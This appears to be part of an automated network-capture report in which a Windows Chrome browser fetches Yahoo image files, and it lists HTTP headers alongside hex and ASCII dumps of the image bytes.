                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [9gx\\7<,Ynu@*~6"$xHz~}zBR*norOLCN9Zs'Hd(-3S0}(67)=)25>&AqHBmOK`%+~GxG~@xu/6Cl79V1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: d0 d6 27 a4 e9 3d 73 66 be d8 dc 91 79 0a 78 c0 8f 39 71 9d 71 4e 85 27 69 8c d3 49 cb 69 e7 dc ef a9 44 1e 67 18 35 5a ea fa da cf 66 ce 66 da a5 4e b4 5c 9b f5 24 fa e3 89 da 3b 86 da ba c0 bd 6e f7 ba 42 b8 e9 a4 db 1f 74 34 12 a6 16 da d5 94 9d fb 70 a2 54 93 83 8c ed c7 5a 9e 9d cc 6a 47 28 96 9d ad dd dc 71 6f 97 18 be de e5 21 c3 de 28 70 8b 87 ba 73 59 e9 0b 5d f6 f3 72 73 53 c1 96 db 53 1c 8a e7 61 db 2d bc 24 0c a9 7b 41 3d 4e e3 92 7c b9 d1 3a 89 a3 ad b7 e1 bd 52 fe fe 95 7a 56 dd 38 ac 7a 95 c5 8b 89 da 0b 4d 46 72 1c dd 39 aa 17 73 0a 42 d8 9d 68 ba 6c 0a c1 ce 54 87 37 37 92 00 07 ba 0f 2e 47 ca 2b 59 7f 4b 73 ab e2 8e 0d d6 35 3d 45 54 a1 4f 31 c7 e5 e8 26 e3 1f 1b 6e 1c 63 31 0c ab 4b 30 58 b3 da 27 45 8a 84 38 a7 5c 08 2c a8 e1 6b 3c ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: '=sfyx9qqN'iIiDg5ZffN\$;nBt4pTZjG(qo!(psY]rsSSa-${A=N|:RzV8zMFr9sBhlT77.G+YKs5=ETO1&nc1K0X'E8\,k<
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: d6 b4 91 da 72 dd 64 7d 03 fe da 3a ab d0 29 ff 00 a6 47 e7 d5 fa e5 be 9f e6 ff 00 93 7d 5c 21 a1 d6 0f 66 36 91 54 f0 47 ea 51 9c 69 b5 b2 2d db e7 c2 71 f5 b4 77 36 f2 12 48 46 7c 39 7f 8d 6f 69 b5 7a 6c c9 bf a5 d4 28 c2 a4 e4 6c 27 1e 44 d7 51 19 64 e7 6a 2e 57 80 59 35 2a 44 00 49 cd 36 07 c8 05 53 0c 04 f4 a2 88 e0 68 c1 03 48 23 d4 80 67 a9 0b 23 8b 8a 9a a4 86 bb 37 3f 48 01 ce de 95 41 60 b7 2c e0 2a 13 4b 8f 2f 0b 1d 3a 51 2c 11 ef 92 7d 66 4a 8b 21 f7 4e 54 ae 78 f2 ac ba cb 06 dd 0e db 8e 8b 56 e1 50 a5 92 4c a0 ba 61 c0 94 f2 eb 48 41 0a c6 79 50 06 03 06 96 44 19 42 23 a3 95 21 03 07 1e 15 1e 04 14 ea b9 51 25 91 99 52 7b 4f 5d 8d b7 82 b7 ed a7 0e c9 31 e3 b7 cf f6 9f 41 57 ee 05 55 6b 86 4d 41 64 c1 b1 1b 72 5c c6 22 36 3b cf b8 96 d3 f3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rd}:)G}\!f6TGQi-qw6HF|9oizl(l'DQdj.WY5*DI6ShH#g#7?HA`,*K/:Q,}fJ!NTxVPLaHAyPDB#!Q%R{O]1AWUkMAdr\"6;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 09 bb 32 9c 2a 65 f4 3c 9e dd 9c fe b2 d3 fa e0 e3 3e 63 d7 a0 f2 eb dd 06 ea f6 79 e5 7d fd 8f 96 1d 84 ea 54 78 5d d9 49 71 af 54 45 d5 5c 51 d4 37 c8 0f a5 f8 af cc 52 58 71 27 21 6d a4 04 a1 43 d0 a4 0f 5a f4 4d 1a cd d9 5b 42 81 f4 d7 06 59 ca cb 46 a3 cd b3 21 20 e7 c2 b5 5c b0 75 ca a8 12 9a 64 c9 55 4c 08 ae 11 57 2a 0b f1 91 d5 e6 96 81 f3 23 15 2a 65 2b e8 2b ca 0e 2f d4 6b b3 68 a8 10 92 17 29 46 43 99 c8 0a f8 47 c8 55 85 5f 06 1d af 0e 5a da 3e 66 94 99 21 08 c5 57 9e 19 bd 08 a8 ac 24 1a ca c2 08 27 9d 57 25 c0 a8 48 1d 02 73 46 93 60 fe 42 77 15 e9 47 94 bb 8e bd 50 c4 e6 98 b7 bf 76 7e ec f0 0e 17 48 29 6c 8e ea 70 31 cf cf fd fa d4 ea e1 a5 dc c7 fb 22 de 57 1e 62 b0 e8 96 90 da 42 10 90 90 3a 00 31 55 9c b2 6b a5 18 ec 80 e0 79 d3 06 ea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2*e<>cy}Tx]IqTE\Q7RXq'!mCZM[BYF! \udULW*#*e++/kh)FCGU_Z>f!W$'W%HsF`BwGPv~H)lp1"WbB:1Uky


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              50192.168.2.45107087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC763OUTGET /uu/api/res/1.2/o1vbp9skMm8aYhU74pmr3g--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/16f9bfa0-8532-11ef-8f7e-7d7832959f0a.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1113INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="16f9bfa0-8532-11ef-8f7e-7d7832959f0a.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "9623d7971197b39cbdb5db4cf22447d4"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 05:00:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 05:06:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=0;start=2024-10-08T05:06:30.682Z;desc=hit,rtt;dur=84,content-info;desc="width=356,height=180,bytes=7536,owidth=2344,oheight=1320,obytes=304257,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: e226612b79ad57a1753a12e412ac446a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 50825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 52 49 46 46 68 1d 00 00 57 45 42 50 56 50 38 20 5c 1d 00 00 b0 9f 00 9d 01 2a 64 01 b4 00 3e 79 36 96 48 a4 a2 a2 a8 25 f5 0c 91 00 0f 09 4d bf 90 03 25 04 87 f0 ab 6f d5 cf ea 79 f0 5c df d8 71 b6 a0 1b 2b 7a ec dc 63 ce ef cf 01 d7 37 e8 29 d3 19 40 63 ac 3f 99 a8 58 f3 7c 03 89 ef ff 1f d2 c6 74 2a c3 79 ef b0 2f e9 9f 46 6d 04 bd 77 ec 29 d2 13 d1 bf f6 58 ca 06 2d 93 8e 95 8a 72 76 23 86 b2 ea 48 a3 78 85 e9 97 5b 53 5e af ab 1e 9e d2 c8 97 fc 8c 53 fb a9 f4 bb e5 84 4f ca 22 4a 0c 1d d0 18 50 05 73 71 19 05 69 9f c0 55 60 88 9c a8 d5 5a 01 8f c4 4f e7 1f 2d 6d 56 5b 4f a2 ac 9e 79 72 c8 14 b6 41 3d 19 84 65 02 1b 5d 15 0c ed ba 8e 48 33 4e 99 15 94 e7 fb cc 4a 39 f9 53 8c 79 bb cc db 15 e8 5d 04 07 ee 77 4a 06 db e9 7b 02 9b 6e 3a f2 16 96 79 f3 b4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFFhWEBPVP8 \*d>y6H%M%oy\q+zc7)@c?X|t*y/Fmw)X-rv#Hx[S^SO"JPsqiU`ZO-mV[OyrA=e]H3NJ9Sy]wJ{n:y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 41 4f 2a d2 96 00 00 fe fa f7 cf 51 d7 7f a1 1a fb 94 e8 cf 35 bc de 67 b5 63 e0 4f 2d 5c 29 5b bc 51 bd 5c 79 ad a9 40 e7 b4 10 c5 3b 12 a6 9a 89 b1 60 7a 48 f1 d9 41 7d d2 04 61 c4 66 9a 68 00 1f c3 b2 3b 5c 24 cd 76 77 cc f6 07 4b 2f b4 ea 93 7d a4 b6 31 da 47 89 12 39 47 a2 62 38 b7 e9 71 f4 e8 be 69 65 a8 c9 dc 78 e0 34 0f 15 bc d9 ab 22 a7 22 a5 69 00 f6 1a 45 9b f9 38 ac 3b e5 e7 b1 6c 0d 30 77 e5 29 d2 aa 01 ac 63 e7 d0 ee e6 d8 3f 85 52 d2 8a aa 75 05 dc 23 da 51 a3 9b 1c 15 82 a1 22 e7 cf 32 68 49 d2 cb 1d 46 1b 7d 44 fe 33 d6 9e f1 64 54 95 26 db 77 e2 65 aa 62 2d bd 8f 7a 87 e1 30 a0 69 13 d7 87 8f 58 0e a5 42 da 77 b9 69 aa fa e0 23 40 ed 7b 61 ab 19 f1 33 b9 b2 01 f7 fb 31 6c f7 6c 1c c2 b7 f1 a1 26 b8 07 8c 69 9e c8 7c d1 c5 36 29 47 c7 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: AO*Q5gcO-\)[Q\y@;`zHA}afh;\$vwK/}1G9Gb8qiex4""iE8;l0w)c?Ru#Q"2hIF}D3dT&web-z0iXBwi#@{a31ll&i|6)G_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 67 43 04 84 60 01 ef 52 e0 91 9f a9 64 db 8c ea b7 42 3a 07 bf 05 04 6e a9 84 4f 10 32 8a d1 05 16 18 d9 25 83 d1 71 63 74 94 3f 85 1a 63 41 a0 34 49 a2 4c ce 2e b1 38 4d 7d 6c c4 01 a6 dd d3 e9 24 3b 74 8f d5 6f c7 a7 16 c3 76 6b de 84 1a 65 ae a9 0e 22 ec c1 9c 5c 3c d6 09 a4 e9 f7 b2 71 0a 73 5f 58 0e cd b4 03 c7 f6 96 ea f0 30 45 47 db c2 e6 4b 5e 58 b1 7e 21 9c 98 7b 9f 55 b4 e9 72 39 da b0 5f 2d bb 4f a5 fd ea 94 4a 47 6f a2 08 3d 20 58 ee 1f 0d d7 23 17 42 bd ce ff 11 d5 00 5a 2a da c4 7b 3b 5f 48 cb 5e 17 85 28 81 e1 4a 44 84 2d 07 9f f2 4e 68 ee 13 d3 7a 0f 83 b2 42 46 85 af aa dd 6a 71 ac c6 4e f6 fd 72 76 a9 95 4e 21 7f 48 56 54 ff 57 f5 b2 10 82 42 5a b7 de 0b 62 5a d5 d1 db 22 2c 21 11 10 bd 30 f8 07 ce 0e 79 c5 10 d1 17 9b 2b 71 57 60 5c 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gC`RdB:nO2%qct?cA4IL.8M}l$;tovke"\<qs_X0EGK^X~!{Ur9_-OJGo= X#BZ*{;_H^(JD-NhzBFjqNrvN!HVTWBZbZ",!0y+qW`\h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: c6 8b 79 2b 4e c2 89 75 bb 27 b0 57 cd 18 c3 37 0c 39 e8 11 6d 5c 80 5a 9a 3e 98 b0 4e 53 d2 29 ce 51 2b 98 e2 cd c2 88 a5 16 8b cf 84 50 6a b4 df 2e c8 7c a3 e1 ef 9f 9f 2c 15 9c 84 79 f7 75 e1 be bf 33 cc 5c 53 e3 ae 4f 72 6b 5c df 5b e7 37 c5 b5 30 cf 75 c2 b1 af 26 b2 46 5a bf 78 cf 15 68 22 b6 eb 94 7f b1 96 c7 51 9d 5f 88 1c c6 90 78 15 ba 20 37 f9 48 a6 30 99 26 d2 68 91 e1 7d b9 82 1a f2 b2 f2 dc 89 fa 3c ff 39 3c d6 13 ae 4c ca f9 52 6c 62 a8 1c 9c 2f f1 c9 d5 55 94 19 1e af 39 bb 69 39 d9 d7 62 ae a0 4c 7e ed eb 09 7c ee af f3 19 52 92 ae 69 e5 bc 7e 69 88 3d de fd 7b df 8b 82 10 f7 ed b5 c2 c9 39 db 01 3b fe 3e c9 37 e8 fe 57 07 fe 49 b8 13 42 06 16 c4 a3 6b a4 8c 55 2f 82 1c a1 77 be 2c 79 18 40 cb 56 ce 3d 06 b4 7b 74 bf 27 8b f9 ee 13 a3 b6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: y+Nu'W79m\Z>NS)Q+Pj.|,yu3\SOrk\[70u&FZxh"Q_x 7H0&h}<9<LRlb/U9i9bL~|Ri~i={9;>7WIBkU/w,y@V={t'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 1a 04 6b de d1 54 da 47 7d 99 89 87 b4 cb 3c 7a cf 9c 31 ab b9 07 95 62 f7 62 f2 91 d4 6f b3 df 13 1b 8e ae 14 9e 47 34 84 62 f2 50 73 78 a9 1b 0b a3 cf f9 22 8f ff 11 0d fc 24 5b db e1 ef 47 4b 28 d2 6c 66 93 4a 65 78 16 ad 91 e6 dd 07 68 a6 1a 3b 70 7d 52 35 3b 13 d4 74 ac 70 52 0a 61 96 06 e5 1e 60 ce de 18 ea 63 6a 1b 31 1c 28 ff e4 c8 23 5b 8d 76 ee 0e f4 c8 62 d6 91 ac d1 1d cc 9a 4b 43 5e ce 1b 92 44 7d 7b f2 04 2d 4b cd de b6 24 dc 65 30 4a a4 c3 04 e9 2c 8e a9 0b 07 6e 57 c7 e5 a3 72 ac b2 7b 30 d5 d5 83 b9 67 f4 a5 29 80 44 2f 4f 84 fb 10 37 1e 2a b5 5d 06 5f 06 95 af 00 87 40 94 04 6b 99 6a 4e dd 90 fe a2 bb 7d aa 73 39 ba ce 6a 98 6f 9b 09 fc cb c9 5e 02 61 98 d2 bb fd dc 16 d5 5c 88 da 72 d0 71 88 ed 71 5d 17 9c cb b4 df 23 40 ee f4 7f 44 48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: kTG}<z1bboG4bPsx"$[GK(lfJexh;p}R5;tpRa`cj1(#[vbKC^D}{-K$e0J,nWr{0g)D/O7*]_@kjN}s9jo^a\rqq]#@DH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1036INData Raw: 88 ea a6 5b b1 ad ef ee 9f a7 8a 6a 3a 61 84 79 e1 a4 85 1f 90 ee 35 84 00 23 45 59 a9 f0 76 cd e0 97 95 1b a4 0e 71 41 aa af fb 1e 7f 77 19 cf 2e 89 a9 91 29 a6 4e f1 09 64 a9 ba c0 d3 fb d7 7d 4a ec b8 d8 4a 26 24 bc 2a 7b 1a 89 a1 f0 7d 69 9d 69 72 f8 17 a5 44 b4 83 0e 80 38 15 12 95 d8 40 f4 bf 53 fe a9 0e e2 ac a0 ff 94 9c 3e ac 2a 64 52 d3 af be 71 a6 fc b5 4e 9f f3 ef 05 c5 03 bb 60 68 56 28 e2 f0 b5 c0 3b 3d 72 86 82 19 4d 33 88 86 e2 74 e5 8d 72 13 4c 71 6c aa e6 71 9f 41 d2 33 6d c0 d4 de ed 72 bd 93 c0 a0 55 d7 b4 0b 40 f3 ab 50 7c 8b 4c e1 40 35 52 31 30 ad 85 3d d5 b7 ee 77 c8 b4 eb b6 ff 91 8a af 12 fc 75 93 b3 ba a0 a1 f3 d5 30 22 ef 7d d5 e3 45 36 f1 35 47 cf ba ba e7 f9 c3 55 ab cd 28 83 61 ea cb 39 bc a3 67 cb 1b cb bb 2f 1c b0 9a 71 1c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [j:ay5#EYvqAw.)Nd}JJ&$*{}iirD8@S>*dRqN`hV(;=rM3trLqlqA3mrU@P|L@5R10=wu0"}E65GU(a9g/q


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              51192.168.2.45107487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC530OUTGET /uu/api/res/1.2/r8TW9c47hyxw22EECsC9Qw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/3e3ed6c0-859d-11ef-b251-e700ef1e3219.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="3e3ed6c0-859d-11ef-b251-e700ef1e3219.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "30c27c2ae036d942104e83a7abb72537"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 17:49:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 17:49:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=27;cpu=0;start=2024-10-08T17:49:17.933Z;desc=miss,rtt;dur=91,content-info;desc="width=356,height=180,bytes=13284,owidth=5829,oheight=3279,obytes=1287633,ef=(1,13,17,23,30)",cloudinary;dur=19;start=2024-10-08T17:49:17.936Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: 045bfe3a40868cc7c3706ddb35eece7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 5059
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_cache: miss
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 045bfe3a40868cc7c3706ddb35eece7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 28495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC67INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: JFIFXICC_PROFILEHLinomntrRGB XYZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 21 03 2d 03 38 03 43 03 4f 03 5a 03 66 03 72 03 7e 03 8a 03 96 03 a2 03 ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !-8COZfr~ -;HUcq~+:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 47 85 ab 86 0e 86 72 86 d7 87 3b 87 9f 88 04 88 69 88 ce 89 33 89 99 89 fe 8a 64 8a ca 8b 30 8b 96 8b fc 8c 63 8c ca 8d 31 8d 98 8d ff 8e 66 8e ce 8f 36 8f 9e 90 06 90 6e 90 d6 91 3f 91 a8 92 11 92 7a 92 e3 93 4d 93 b6 94 20 94 8a 94 f4 95 5f 95 c9 96 34 96 9f 97 0a 97 75 97 e0 98 4c 98 b8 99 24 99 90 99 fc 9a 68 9a d5 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac d0 ad 44 ad b8 ae 2d ae a1 af 16 af 8b b0 00 b0 75 b0 ea b1 60 b1 d6 b2 4b b2 c2 b3 38 b3 ae b4 25 b4 9c b5 13 b5 8a b6 01 b6 79 b6 f0 b7 68 b7 e0 b8 59 b8 d1 b9 4a b9 c2 ba 3b ba b5 bb 2e bb a7 bc 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Gr;i3d0c1f6n?zM _4uL$hBd@iG&vV8nR7u\D-u`K8%yhYJ;.!
